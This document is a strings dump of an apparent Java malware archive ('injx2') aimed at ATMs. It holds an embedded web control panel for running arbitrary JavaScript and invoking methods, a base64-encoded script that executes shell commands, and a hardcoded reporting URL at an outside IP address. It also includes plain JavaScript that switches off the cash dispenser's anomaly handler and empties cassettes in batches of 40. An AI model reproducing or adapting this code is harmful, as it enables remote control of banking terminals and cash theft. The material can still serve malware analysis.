0000000076FF 0000000076FF 0 getCanonicalPath 000000007712 000000007712 0 appendClassPath 000000007723 000000007723 0 /(Ljava/lang/String;)Linjx2/javassist/ClassPath; 000000007756 000000007756 0 getParentFile 000000007766 000000007766 0 ()Ljava/io/File; 000000007779 000000007779 0 getAbsolutePath 00000000778B 00000000778B 0 (Ljava/lang/String;Z)V 0000000077A4 0000000077A4 0 setErr 0000000077AD 0000000077AD 0 (Ljava/io/PrintStream;)V 0000000077C8 0000000077C8 0 (Ljava/lang/Runnable;)V 0000000077E2 0000000077E2 0 start File pos Mem pos ID Text ======== ======= == ==== 0000000077EA 0000000077EA 0 sleep 0000000077F9 0000000077F9 0 getProtectionDomain 00000000780E 00000000780E 0 "()Ljava/security/ProtectionDomain; 000000007834 000000007834 0 java/security/ProtectionDomain 000000007855 000000007855 0 getCodeSource 000000007865 000000007865 0 ()Ljava/security/CodeSource; 000000007884 000000007884 0 java/security/CodeSource 00000000789F 00000000789F 0 getLocation 0000000078AD 0000000078AD 0 ()Ljava/net/URL; 0000000078C0 0000000078C0 0 toURI 0000000078C8 0000000078C8 0 ()Ljava/net/URI; 0000000078DB 0000000078DB 0 java/net/URI 0000000078EA 0000000078EA 0 getPath 0000000078F3 0000000078F3 0 "appendToBootstrapClassLoaderSearch 000000007919 000000007919 0 (Ljava/util/jar/JarFile;)V 000000007936 000000007936 0 currentThread 000000007946 000000007946 0 ()Ljava/lang/Thread; 00000000795D 00000000795D 0 setContextClassLoader 000000007975 000000007975 0 (Ljava/lang/ClassLoader;)V 000000007991 000000007991 0 loadClass 00000000799D 00000000799D 0 @(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method; 0000000079E1 0000000079E1 0 java/lang/reflect/Method 0000000079FC 0000000079FC 0 invoke 000000007A04 000000007A04 0 9(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; 000000009BDC 000000009BDC 0 injx2/Global.class 000000009D51 000000009D51 0 Ljava/io/BufferedWriter; 000000009D6C 000000009D6C 0 verbose 000000009D79 000000009D79 0 logoutput 000000009D86 000000009D86 0 Ljava/lang/String; 000000009D9B 000000009D9B 0 instrument 000000009DA7 000000009DA7 0 &Ljava/lang/instrument/Instrumentation; 000000009DD0 000000009DD0 0 origbytes 000000009DDD 000000009DDD 0 Ljava/util/Hashtable; 000000009DF4 000000009DF4 0 Signature 000000009E00 000000009E00 0 +Ljava/util/Hashtable<Ljava/lang/String;[B>; 000000009E2F 000000009E2F 0 alreadyinjected 000000009E40 000000009E40 0 ;Ljava/util/Hashtable<Ljava/lang/String;Ljava/lang/String;>; 000000009E85 000000009E85 0 Ljava/util/Map; 000000009E96 000000009E96 0 5Ljava/util/Map<Ljava/lang/Object;Ljava/lang/Object;>; 000000009ECF 000000009ECF 0 stack 000000009ED7 000000009ED7 0 classmap 000000009EE2 000000009EE2 0 runningclass 000000009EF1 000000009EF1 0 <init> 000000009F07 000000009F07 0 LineNumberTable 000000009F19 000000009F19 0 LocalVariableTable 000000009F35 000000009F35 0 Linjx2/Global; 000000009F46 000000009F46 0 scandyna 000000009F5B 000000009F5B 0 tsize 000000009F6D 000000009F6D 0 Ljava/util/zip/ZipEntry; 000000009F95 000000009F95 0 Ljava/net/URL; 000000009FAB 000000009FAB 0 Ljava/io/IOException; 000000009FC9 000000009FC9 0 Ljava/util/zip/ZipInputStream; 000000009FF0 000000009FF0 0 Ljava/security/CodeSource; 00000000A00D 00000000A00D 0 StackMapTable 00000000A032 00000000A032 0 callback 00000000A03C 00000000A03C 0 K(Ljava/lang/String;Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/Object; 00000000A08B 00000000A08B 0 ptype 00000000A093 00000000A093 0 [Ljava/lang/Class; 00000000A0A8 00000000A0A8 0 mname 00000000A0B9 00000000A0B9 0 Ljava/lang/Class; File pos Mem pos ID Text ======== ======= == ==== 00000000A0D1 00000000A0D1 0 Ljava/lang/Object; 00000000A0ED 00000000A0ED 0 [Ljava/lang/reflect/Method; 00000000A10B 00000000A10B 0 Ljava/lang/Exception; 00000000A123 00000000A123 0 classs 00000000A12C 00000000A12C 0 method 00000000A13C 00000000A13C 0 [Ljava/lang/Object; 00000000A157 00000000A157 0 Linjx2/ViewClassLoader; 00000000A171 00000000A171 0 LocalVariableTypeTable 00000000A18A 00000000A18A 0 [Ljava/lang/Class<*>; 00000000A1B6 00000000A1B6 0 insertjar 00000000A1C3 00000000A1C3 0 ([B)V 00000000A1CB 00000000A1CB 0 cname 00000000A1D3 00000000A1D3 0 stream 00000000A1DC 00000000A1DC 0 entry 00000000A1E4 00000000A1E4 0 jfile 00000000A1EC 00000000A1EC 0 checklog 00000000A203 00000000A203 0 Ljava/io/File; 00000000A217 00000000A217 0 <clinit> 00000000A222 00000000A222 0 SourceFile 00000000A22F 00000000A22F 0 Global.java 00000000A242 00000000A242 0 injx2/Global 00000000A269 00000000A269 0 java/util/zip/ZipInputStream 00000000A2A2 00000000A2A2 0 dynamic/ 00000000A2DD 00000000A2DD 0 java/io/IOException 00000000A308 00000000A308 0 injx2/ViewClassLoader 00000000A33C 00000000A33C 0 java/lang/Object 00000000A354 00000000A354 0 java/lang/Exception 00000000A36A 00000000A36A 0 java/io/ByteArrayInputStream 00000000A38E 00000000A38E 0 .class 00000000A3BD 00000000A3BD 0 java/io/File 00000000A3CC 00000000A3CC 0 /dev/shm 00000000A3E1 00000000A3E1 0 java/lang/StringBuilder 00000000A400 00000000A400 0 /.loginside 00000000A413 00000000A413 0 os.name 00000000A432 00000000A432 0 APPDATA 00000000A441 00000000A441 0 \logft.log 00000000A44E 00000000A44E 0 stdout 00000000A457 00000000A457 0 java/io/BufferedWriter 00000000A470 00000000A470 0 java/io/OutputStreamWriter 00000000A49C 00000000A49C 0 java/io/FileWriter 00000000A4B6 00000000A4B6 0 java/util/HashMap 00000000A4E1 00000000A4E1 0 java/security/CodeSource 00000000A4FC 00000000A4FC 0 java/net/URL 00000000A50B 00000000A50B 0 java/util/zip/ZipEntry 00000000A524 00000000A524 0 java/lang/Throwable 00000000A53A 00000000A53A 0 java/lang/String 00000000A54D 00000000A54D 0 java/lang/Class 00000000A55F 00000000A55F 0 getProtectionDomain 00000000A574 00000000A574 0 "()Ljava/security/ProtectionDomain; 00000000A59A 00000000A59A 0 java/security/ProtectionDomain 00000000A5BB 00000000A5BB 0 getCodeSource 00000000A5CB 00000000A5CB 0 ()Ljava/security/CodeSource; 00000000A5EA 00000000A5EA 0 getLocation 00000000A5F8 00000000A5F8 0 ()Ljava/net/URL; 00000000A60B 00000000A60B 0 openStream 00000000A618 00000000A618 0 ()Ljava/io/InputStream; 00000000A632 00000000A632 0 (Ljava/io/InputStream;)V 00000000A64D 00000000A64D 0 getNextEntry 00000000A65C 00000000A65C 0 ()Ljava/util/zip/ZipEntry; 00000000A679 00000000A679 0 getName File pos Mem pos ID Text ======== ======= == ==== 00000000A683 00000000A683 0 ()Ljava/lang/String; 00000000A69A 00000000A69A 0 startsWith 00000000A6A7 00000000A6A7 0 (Ljava/lang/String;)Z 00000000A6BF 00000000A6BF 0 endsWith 00000000A6CA 00000000A6CA 0 getSize 00000000A6E1 00000000A6E1 0 ([B)I 00000000A6E9 00000000A6E9 0 java/lang/System 00000000A6FB 00000000A6FB 0 arraycopy 00000000A707 00000000A707 0 *(Ljava/lang/Object;ILjava/lang/Object;II)V 00000000A735 00000000A735 0 close 00000000A73D 00000000A73D 0 java/util/logging/Logger 00000000A757 00000000A757 0 getLogger 00000000A763 00000000A763 0 .(Ljava/lang/String;)Ljava/util/logging/Logger; 00000000A795 00000000A795 0 java/util/logging/Level 00000000A7AF 00000000A7AF 0 SEVERE 00000000A7B8 00000000A7B8 0 Ljava/util/logging/Level; 00000000A7D9 00000000A7D9 0 C(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V 00000000A81F 00000000A81F 0 loadClass 00000000A82B 00000000A82B 0 %(Ljava/lang/String;)Ljava/lang/Class; 00000000A854 00000000A854 0 newInstance 00000000A862 00000000A862 0 ()Ljava/lang/Object; 00000000A879 00000000A879 0 getMethods 00000000A886 00000000A886 0 ()[Ljava/lang/reflect/Method; 00000000A8A6 00000000A8A6 0 java/lang/reflect/Method 00000000A8C1 00000000A8C1 0 equals 00000000A8CA 00000000A8CA 0 (Ljava/lang/Object;)Z 00000000A8E2 00000000A8E2 0 getParameterTypes 00000000A8F6 00000000A8F6 0 ()[Ljava/lang/Class; 00000000A90D 00000000A90D 0 invoke 00000000A915 00000000A915 0 9(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; 00000000A952 00000000A952 0 java/util/Map 00000000A967 00000000A967 0 8(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object; 00000000A9A3 00000000A9A3 0 printStackTrace 00000000A9B5 00000000A9B5 0 (Ljava/lang/String;)V 00000000A9CD 00000000A9CD 0 isDirectory 00000000A9E1 00000000A9E1 0 append 00000000A9E9 00000000A9E9 0 -(Ljava/lang/String;)Ljava/lang/StringBuilder; 00000000AA1A 00000000AA1A 0 toString 00000000AA25 00000000AA25 0 getProperty 00000000AA32 00000000AA32 0 &(Ljava/lang/String;)Ljava/lang/String; 00000000AA5C 00000000AA5C 0 toLowerCase 00000000AA6A 00000000AA6A 0 indexOf 00000000AA74 00000000AA74 0 (Ljava/lang/String;)I 00000000AA8C 00000000AA8C 0 getenv 00000000AA9B 00000000AA9B 0 Ljava/io/PrintStream; 00000000AAB3 00000000AAB3 0 (Ljava/io/OutputStream;)V 00000000AACF 00000000AACF 0 (Ljava/io/Writer;)V 00000000AAE5 00000000AAE5 0 java/util/Collections 00000000AAFD 00000000AAFD 0 synchronizedMap 00000000AB0E 00000000AB0E 0 (Ljava/util/Map;)Ljava/util/Map; 00000000B357 00000000B357 0 injx2/HTTPServ$MyHandler$dispen.class 00000000B44E 00000000B44E 0 Ljava/lang/String; 00000000B468 00000000B468 0 this$0 00000000B473 00000000B473 0 MyHandler 00000000B480 00000000B480 0 InnerClasses 00000000B48F 00000000B48F 0 Linjx2/HTTPServ$MyHandler; 00000000B4AC 00000000B4AC 0 <init> 00000000B4B4 00000000B4B4 0 A(Linjx2/HTTPServ$MyHandler;Ljava/lang/String;Ljava/lang/String;)V 00000000B500 00000000B500 0 LineNumberTable 00000000B512 00000000B512 0 LocalVariableTable File pos Mem pos ID Text ======== ======= == ==== 00000000B52E 00000000B52E 0 dispen 00000000B536 00000000B536 0 !Linjx2/HTTPServ$MyHandler$dispen; 00000000B56C 00000000B56C 0 result 00000000B575 00000000B575 0 rawData 00000000B58A 00000000B58A 0 Ljava/net/URL; 00000000B5A2 00000000B5A2 0 Ljava/net/HttpURLConnection; 00000000B5C6 00000000B5C6 0 Ljava/io/OutputStream; 00000000B5E5 00000000B5E5 0 Ljava/lang/Exception; 00000000B602 00000000B602 0 StackMapTable 00000000B61B 00000000B61B 0 SourceFile 00000000B628 00000000B628 0 HTTPServ.java 00000000B651 00000000B651 0 %%list_dispense%% 00000000B67A 00000000B67A 0 java/lang/StringBuilder 00000000B6CE 00000000B6CE 0 !application/x-www-form-urlencoded 00000000B6F3 00000000B6F3 0 java/net/URL 00000000B711 00000000B711 0 java/net/HttpURLConnection 00000000B73F 00000000B73F 0 Content-Type 00000000B753 00000000B753 0 Content-Length 00000000B785 00000000B785 0 java/lang/Exception 00000000B79B 00000000B79B 0 ERRSRV 00000000B7A5 00000000B7A5 0 injx2/HTTPServ$MyHandler$dispen 00000000B7C7 00000000B7C7 0 java/lang/Thread 00000000B7DD 00000000B7DD 0 injx2/HTTPServ$MyHandler 00000000B7FE 00000000B7FE 0 java/lang/String 00000000B811 00000000B811 0 replaceAll 00000000B81D 00000000B81D 0 8(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String; 00000000B859 00000000B859 0 runjs 00000000B860 00000000B860 0 &(Ljava/lang/String;)Ljava/lang/String; 00000000B88A 00000000B88A 0 injx2/Global 00000000B8A0 00000000B8A0 0 Ljava/io/BufferedWriter; 00000000B8BB 00000000B8BB 0 append 00000000B8C3 00000000B8C3 0 -(Ljava/lang/String;)Ljava/lang/StringBuilder; 00000000B8F4 00000000B8F4 0 toString 00000000B8FF 00000000B8FF 0 ()Ljava/lang/String; 00000000B916 00000000B916 0 java/io/BufferedWriter 00000000B92F 00000000B92F 0 write 00000000B937 00000000B937 0 (Ljava/lang/String;)V 00000000B94F 00000000B94F 0 flush 00000000B957 00000000B957 0 getBytes 00000000B968 00000000B968 0 javax/xml/bind/DatatypeConverter 00000000B98C 00000000B98C 0 printBase64Binary 00000000B9A0 00000000B9A0 0 ([B)Ljava/lang/String; 00000000B9B9 00000000B9B9 0 java/net/URLEncoder 00000000B9CF 00000000B9CF 0 encode 00000000B9D7 00000000B9D7 0 urlreport 00000000B9E4 00000000B9E4 0 openConnection 00000000B9F5 00000000B9F5 0 ()Ljava/net/URLConnection; 00000000BA12 00000000BA12 0 setDoOutput 00000000BA27 00000000BA27 0 setRequestMethod 00000000BA3A 00000000BA3A 0 setRequestProperty 00000000BA4E 00000000BA4E 0 '(Ljava/lang/String;Ljava/lang/String;)V 00000000BA79 00000000BA79 0 length 00000000BA88 00000000BA88 0 valueOf 00000000BA92 00000000BA92 0 (I)Ljava/lang/String; 00000000BAAA 00000000BAAA 0 connect 00000000BAB4 00000000BAB4 0 getOutputStream 00000000BAC6 00000000BAC6 0 ()Ljava/io/OutputStream; 00000000BAE1 00000000BAE1 0 java/io/OutputStream 00000000BAF8 00000000BAF8 0 ([B)V 00000000BB00 00000000BB00 0 getInputStream File pos Mem pos ID Text ======== ======= == ==== 00000000BB11 00000000BB11 0 ()Ljava/io/InputStream; 00000000BB2B 00000000BB2B 0 injx2/HTTPServ 00000000BDF1 00000000BDF1 0 injx2/HTTPServ$MyHandler.class 00000000C0D6 00000000C0D6 0 MyHandler 00000000C0E3 00000000C0E3 0 InnerClasses 00000000C0F2 00000000C0F2 0 dispen 00000000C0FA 00000000C0FA 0 urlreport 00000000C107 00000000C107 0 Ljava/lang/String; 00000000C11C 00000000C11C 0 jscmd 00000000C131 00000000C131 0 <init> 00000000C147 00000000C147 0 LineNumberTable 00000000C159 00000000C159 0 LocalVariableTable 00000000C175 00000000C175 0 Linjx2/HTTPServ$MyHandler; 00000000C192 00000000C192 0 runjs 00000000C199 00000000C199 0 &(Ljava/lang/String;)Ljava/lang/String; 00000000C1C7 00000000C1C7 0 Ljavax/script/ScriptException; 00000000C1E8 00000000C1E8 0 script 00000000C1F1 00000000C1F1 0 manager 00000000C1FA 00000000C1FA 0 "Ljavax/script/ScriptEngineManager; 00000000C220 00000000C220 0 engine 00000000C229 00000000C229 0 Ljavax/script/ScriptEngine; 00000000C24C 00000000C24C 0 Ljava/io/StringWriter; 00000000C26A 00000000C26A 0 Ljava/io/PrintWriter; 00000000C289 00000000C289 0 StackMapTable 00000000C2AB 00000000C2AB 0 handle 00000000C2B3 00000000C2B3 0 ((Lcom/sun/net/httpserver/HttpExchange;)V 00000000C2EE 00000000C2EE 0 Ljava/io/InputStream; 00000000C306 00000000C306 0 reader 00000000C30F 00000000C30F 0 Ljava/io/BufferedReader; 00000000C330 00000000C330 0 Ljava/lang/StringBuilder; 00000000C35E 00000000C35E 0 Ljava/util/regex/Pattern; 00000000C37E 00000000C37E 0 Ljava/util/regex/Matcher; 00000000C3B1 00000000C3B1 0 [Ljava/lang/Class; 00000000C3D6 00000000C3D6 0 [Ljava/lang/reflect/Method; 00000000C3F8 00000000C3F8 0 Ljava/lang/Class; 00000000C411 00000000C411 0 [Ljava/lang/String; 00000000C427 00000000C427 0 lstatus 00000000C43B 00000000C43B 0 Ljava/lang/Object; 00000000C455 00000000C455 0 Ljava/lang/Exception; 00000000C473 00000000C473 0 [Ljava/lang/Object; 00000000C489 00000000C489 0 match 00000000C498 00000000C498 0 param 00000000C4A0 00000000C4A0 0 entry 00000000C4AD 00000000C4AD 0 Ljava/util/Iterator; 00000000C4C4 00000000C4C4 0 jfile 00000000C4D1 00000000C4D1 0 ptype 00000000C4D9 00000000C4D9 0 mname 00000000C4FA 00000000C4FA 0 Linjx2/ViewClassLoader; 00000000C522 00000000C522 0 function 00000000C52D 00000000C52D 0 xjscmd 00000000C54B 00000000C54B 0 %Lcom/sun/net/httpserver/HttpExchange; 00000000C574 00000000C574 0 response 00000000C57F 00000000C57F 0 method 00000000C588 00000000C588 0 out_cmd 00000000C597 00000000C597 0 Ljava/io/OutputStream; 00000000C5B0 00000000C5B0 0 LocalVariableTypeTable 00000000C5C9 00000000C5C9 0 [Ljava/lang/Class<*>; 00000000C611 00000000C611 0 Exceptions 00000000C621 00000000C621 0 <clinit> 00000000C62C 00000000C62C 0 SourceFile File pos Mem pos ID Text ======== ======= == ==== 00000000C639 00000000C639 0 HTTPServ.java 00000000C64D 00000000C64D 0 javax/script/ScriptEngineManager 00000000C671 00000000C671 0 injx2/HTTPServ 00000000C696 00000000C696 0 java/io/StringWriter 00000000C6AD 00000000C6AD 0 java/io/PrintWriter 00000000C6E2 00000000C6E2 0 javax/script/ScriptException 00000000C720 00000000C720 0 java/lang/StringBuilder 00000000C765 00000000C765 0 java/io/BufferedReader 00000000C77E 00000000C77E 0 java/io/InputStreamReader 00000000C7CF 00000000C7CF 0 &]+)=([ 00000000C80C 00000000C80C 0 Got query 00000000C823 00000000C823 0 Dispensing 00000000C831 00000000C831 0 injx2/HTTPServ$MyHandler$dispen 00000000C88A 00000000C88A 0 I<form action="/eva" method="POST"><textarea rows="15" cols="40" name="j"> 00000000C8D7 00000000C8D7 0 </textarea><br /><input type="submit" value="Run"></form><textarea rows="15" cols="40" readonly> 00000000C93A 00000000C93A 0 </textarea> 00000000C96A 00000000C96A 0 java/lang/Class 00000000C988 00000000C988 0 </h1><br /> 00000000C9A8 00000000C9A8 0 <a href="/mgr? 00000000C9D5 00000000C9D5 0 )</a><br /> 00000000C9E9 00000000C9E9 0 java/lang/String 00000000CA0A 00000000CA0A 0 !<form method="post" action="/mgr? 00000000CA2E 00000000CA2E 0 "><table> 00000000CA3B 00000000CA3B 0 <tr><td><b> 00000000CA48 00000000CA48 0 6</b></td><td><input type="text" name="ps" /></td></tr> 00000000CA81 00000000CA81 0 ;</table><br /><input type="submit" value="Invoke" /></form> 00000000CAC0 00000000CAC0 0 java/lang/Object 00000000CAEA 00000000CAEA 0 <b>Preparing...</b><br /> 00000000CB0B 00000000CB0B 0 <b>Unprotecting...</b><br /> 00000000CB2F 00000000CB2F 0 <b>Invoking...</b><br /> 00000000CB4F 00000000CB4F 0 <b>Return: </b> 00000000CB61 00000000CB61 0 java/lang/Exception 00000000CB77 00000000CB77 0 <h1>Entries: </h1><br /> 00000000CBAC 00000000CBAC 0 </a><br /> 00000000CBB9 00000000CBB9 0 /core 00000000CBDE 00000000CBDE 0 injx2/ViewClassLoader 00000000CC05 00000000CC05 0 <form action="/core" method="post"><table><tr><td> 00000000CC38 00000000CC38 0 <b>Jar: </b></td><td><input type="text" name="0"></td></tr> 00000000CC74 00000000CC74 0 <tr><td><b>Class: </b></td><td><input type="text" name="1"></td></tr><tr><td><b>Method: </b></td><td><input type="text" name="2"></td></tr><tr><td><b>Args: </b></td><td><input type="text" name="3"></td></tr><tr><td><input type="radio" name="4" vale="a"><b> Autostart</b></td><td><input type="radio" name="4" vale="h" checked><b> Handler</b></td></tr><tr><td></td><td><input type="submit" value="Go"></td></tr></table> 00000000CE16 00000000CE16 0 </form> 00000000CE20 00000000CE20 0 This is POST 00000000CE5B 00000000CE5B 0 os.name 00000000CE7D 00000000CE7D 0 cKJd.exe 00000000CE91 00000000CE91 0 %%shell%% 00000000CE9E 00000000CE9E 0 %%arg%% 00000000CEA8 00000000CEA8 0 %%cmdb64%% 00000000CEBF 00000000CEBF 0 Content-Type 00000000CECD 00000000CECD 0 text/html 00000000CEFE 00000000CEFE 0 http://150.100.246.18:60000 00000000CF21 00000000CF21 0 dmFyIEJ1ZmZlcmVkUmVhZGVyPVBhY2thZ2VzLmphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyIik7CnZhciBSZWFkZXI9UGFja2FnZXMuamF2YS5sYW5nLkNsYXNzLmZvck5hbWUoImphdmEuaW8uUmVhZGVyIik7CnZhciBJbnB1dFN0cmVhbT1QYWNrYWdlcy5qYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS5pby5JbnB1dFN0cmVhbSIpOwp2YXIgcD1QYWNrYWdlcy5qYXZhLmxhbmcuUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhbIiUlc2hlbGwlJSIsIiUlYXJnJSUiLGphdmEubGFuZy5TdHJpbmcoUGFja2FnZXMuamF2YXgueG1sLmJpbmQuRGF0YXR5cGVDb252ZXJ0ZXIucGFyc2VCYXNlNjRCaW5hcnkoIiUlY21kYjY0JSUiKSldKTsKdmFyIGJ1Zj1qYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyKGphdmEuaW8uSW5wdXRTdHJlYW1SZWFkZXIocC5nZXRJbnB1dFN0cmVhbSgpKSk7CndoaWxlKDEpewoJdmFyIGxpbmU9YnVmLnJlYWRMaW5lKCk7CglpZihsaW5lIT1udWxsKXsKCQlwcmludChsaW5lKyJcbiIpOwoJfSBlbHNlIHsKCQlicmVhazsKCX0KfQoKCg== 00000000D214 00000000D214 0 var tGlobal=Packages.java.lang.Class.forName("injx2.Global"); 00000000D252 00000000D252 0 var Global=tGlobal.cast(tGlobal.newInstance()); 00000000D282 00000000D282 0 var tPeripheral=Global.runningclass.get("Peripheral"); 00000000D2B9 00000000D2B9 0 var Peripheral=tPeripheral.cast(tPeripheral.newInstance()); 00000000D2F5 00000000D2F5 0 var jsd=Peripheral.Dispenser;if(!jsd.isOk()){print("DERROR");} else {var resume=""; 00000000D349 00000000D349 0 for (var j = 0; j < jsd.getNumberOfCashUnits(); j++) { 00000000D380 00000000D380 0 resume+=jsd.getCashUnit(j).getValue()+":"+jsd.getCashUnit(j).getActual()+";"; 00000000D3D1 00000000D3D1 0 print(resume+"\n");} 00000000D3E8 00000000D3E8 0 var tGlobal=Packages.java.lang.Class.forName("injx2.Global"); 00000000D426 00000000D426 0 var Global=tGlobal.cast(tGlobal.newInstance()); File pos Mem pos ID Text ======== ======= == ==== 00000000D456 00000000D456 0 var tPeripheral=Global.runningclass.get("Peripheral"); 00000000D48D 00000000D48D 0 var Peripheral=tPeripheral.cast(tPeripheral.newInstance()); 00000000D4C9 00000000D4C9 0 var jsd=Peripheral.Dispenser; 00000000D4E7 00000000D4E7 0 jsd.clearDispenseValues(); 00000000D502 00000000D502 0 jsd.removeAnomalyHandler("Dispenser"); 00000000D529 00000000D529 0 var todispen=[%%list_dispense%%]; 00000000D54B 00000000D54B 0 var cassette=[]; 00000000D55C 00000000D55C 0 var resume=""; 00000000D56B 00000000D56B 0 for (var j = 0; j < jsd.getNumberOfCashUnits(); j++) { 00000000D5A2 00000000D5A2 0 resume+=jsd.getCashUnit(j).getValue()+":"+jsd.getCashUnit(j).getActual()+";"; 00000000D5F1 00000000D5F1 0 if(parseInt(jsd.getCashUnit(j).getValue())<=0 || j>=todispen.length){ 00000000D638 00000000D638 0 continue; 00000000D647 00000000D647 0 if(todispen[j]>=jsd.getCashUnit(j).getActual()-100){ 00000000D67D 00000000D67D 0 todispen[j]=jsd.getCashUnit(j).getActual()-100; 00000000D6B2 00000000D6B2 0 cassette.push({denom: jsd.getCashUnit(j).getValue(), id: j}); 00000000D6F3 00000000D6F3 0 print(resume+"\n"); 00000000D707 00000000D707 0 cassette=cassette.sort(function(a, b){return a.denom - b.denom}); 00000000D749 00000000D749 0 for(var ci=cassette.length-1;ci>=0;ci--){ 00000000D773 00000000D773 0 if(todispen[cassette[ci]['id']]>0){ 00000000D798 00000000D798 0 var roundx=Math.ceil(todispen[cassette[ci]['id']]/40); 00000000D7D1 00000000D7D1 0 for(var k=0; k<roundx;k++){ 00000000D7EF 00000000D7EF 0 jsd.clearDispenseValues(); 00000000D80D 00000000D80D 0 var amount=todispen[cassette[ci]['id']]; 00000000D839 00000000D839 0 if(amount>40){ 00000000D84B 00000000D84B 0 amount=40; 00000000D85F 00000000D85F 0 todispen[cassette[ci]['id']]-=amount; 00000000D888 00000000D888 0 jsd.getCashUnit(ci).setDispense(amount); 00000000D8B4 00000000D8B4 0 print(cassette[ci]['id']+":"+cassette[ci]['denom']+":"+amount+"\n"); 00000000D8FC 00000000D8FC 0 var x = jsd.dispense(); 00000000D917 00000000D917 0 if(!x){ print("ERROR:"+jsd.getCommandStatusString()+"\n");break;} 00000000D95C 00000000D95C 0 var y = jsd.present(); 00000000D976 00000000D976 0 var z = jsd.waitForBillsTaken(30); 00000000D9A5 00000000D9A5 0 jsd.setAnomalyHandler("Dispenser"); 00000000D9D0 00000000D9D0 0 injx2/HTTPServ$MyHandler 00000000D9EA 00000000D9EA 0 "com/sun/net/httpserver/HttpHandler 00000000DA10 00000000DA10 0 javax/script/ScriptEngine 00000000DA2B 00000000DA2B 0 #com/sun/net/httpserver/HttpExchange 00000000DA52 00000000DA52 0 java/io/InputStream 00000000DA68 00000000DA68 0 java/util/regex/Pattern 00000000DA82 00000000DA82 0 java/util/regex/Matcher 00000000DA9C 00000000DA9C 0 java/util/Iterator 00000000DAB1 00000000DAB1 0 java/io/IOException 00000000DAC7 00000000DAC7 0 getClassLoader 00000000DAD8 00000000DAD8 0 ()Ljava/lang/ClassLoader; 00000000DAF4 00000000DAF4 0 (Ljava/lang/ClassLoader;)V 00000000DB11 00000000DB11 0 getEngineByExtension 00000000DB27 00000000DB27 0 /(Ljava/lang/String;)Ljavax/script/ScriptEngine; 00000000DB5A 00000000DB5A 0 (Ljava/io/Writer;)V 00000000DB70 00000000DB70 0 getContext 00000000DB7D 00000000DB7D 0 ()Ljavax/script/ScriptContext; 00000000DB9E 00000000DB9E 0 javax/script/ScriptContext 00000000DBBA 00000000DBBA 0 setWriter 00000000DBC7 00000000DBC7 0 setErrorWriter 00000000DBDE 00000000DBDE 0 &(Ljava/lang/String;)Ljava/lang/Object; 00000000DC08 00000000DC08 0 printStackTrace 00000000DC1A 00000000DC1A 0 (Ljava/io/PrintWriter;)V 00000000DC34 00000000DC34 0 getBuffer 00000000DC41 00000000DC41 0 ()Ljava/lang/StringBuffer; 00000000DC5E 00000000DC5E 0 java/lang/StringBuffer 00000000DC77 00000000DC77 0 toString File pos Mem pos ID Text ======== ======= == ==== 00000000DC82 00000000DC82 0 ()Ljava/lang/String; 00000000DC99 00000000DC99 0 getRequestMethod 00000000DCAC 00000000DCAC 0 getRequestURI 00000000DCBC 00000000DCBC 0 ()Ljava/net/URI; 00000000DCCF 00000000DCCF 0 java/net/URI 00000000DCDE 00000000DCDE 0 getPath 00000000DCE8 00000000DCE8 0 equals 00000000DCF1 00000000DCF1 0 (Ljava/lang/Object;)Z 00000000DD09 00000000DD09 0 injx2/Global 00000000DD18 00000000DD18 0 checklog 00000000DD23 00000000DD23 0 getRequestBody 00000000DD34 00000000DD34 0 ()Ljava/io/InputStream; 00000000DD4E 00000000DD4E 0 (Ljava/io/InputStream;)V 00000000DD69 00000000DD69 0 (Ljava/io/Reader;)V 00000000DD7F 00000000DD7F 0 readLine 00000000DD8A 00000000DD8A 0 append 00000000DD92 00000000DD92 0 -(Ljava/lang/String;)Ljava/lang/StringBuilder; 00000000DDC3 00000000DDC3 0 java/net/URLDecoder 00000000DDD9 00000000DDD9 0 decode 00000000DDE9 00000000DDE9 0 Ljava/io/BufferedWriter; 00000000DE04 00000000DE04 0 java/io/BufferedWriter 00000000DE1D 00000000DE1D 0 write 00000000DE25 00000000DE25 0 (Ljava/lang/String;)V 00000000DE3D 00000000DE3D 0 flush 00000000DE45 00000000DE45 0 compile 00000000DE4E 00000000DE4E 0 -(Ljava/lang/String;)Ljava/util/regex/Pattern; 00000000DE7F 00000000DE7F 0 matcher 00000000DE88 00000000DE88 0 3(Ljava/lang/CharSequence;)Ljava/util/regex/Matcher; 00000000DECC 00000000DECC 0 group 00000000DED4 00000000DED4 0 (I)Ljava/lang/String; 00000000DEEC 00000000DEEC 0 replaceAll 00000000DEF8 00000000DEF8 0 8(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String; 00000000DF33 00000000DF33 0 A(Linjx2/HTTPServ$MyHandler;Ljava/lang/String;Ljava/lang/String;)V 00000000DF78 00000000DF78 0 start 00000000DF80 00000000DF80 0 getQuery 00000000DF8B 00000000DF8B 0 split 00000000DF92 00000000DF92 0 '(Ljava/lang/String;)[Ljava/lang/String; 00000000DFBD 00000000DFBD 0 runningclass 00000000DFCC 00000000DFCC 0 Ljava/util/Map; 00000000DFDE 00000000DFDE 0 java/util/Map 00000000DFF3 00000000DFF3 0 &(Ljava/lang/Object;)Ljava/lang/Object; 00000000E01D 00000000E01D 0 getDeclaredMethods 00000000E032 00000000E032 0 ()[Ljava/lang/reflect/Method; 00000000E052 00000000E052 0 java/lang/reflect/Method 00000000E06D 00000000E06D 0 getParameterTypes 00000000E081 00000000E081 0 ()[Ljava/lang/Class; 00000000E098 00000000E098 0 getName 00000000E0A2 00000000E0A2 0 getBytes 00000000E0B3 00000000E0B3 0 javax/xml/bind/DatatypeConverter 00000000E0D7 00000000E0D7 0 printBase64Binary 00000000E0EB 00000000E0EB 0 ([B)Ljava/lang/String; 00000000E104 00000000E104 0 parseBase64Binary 00000000E118 00000000E118 0 (Ljava/lang/String;)[B 00000000E131 00000000E131 0 ([B)V 00000000E138 00000000E138 0 -(Ljava/lang/Object;)Ljava/lang/StringBuilder; 00000000E169 00000000E169 0 java/lang/Integer 00000000E17D 00000000E17D 0 parseInt 00000000E188 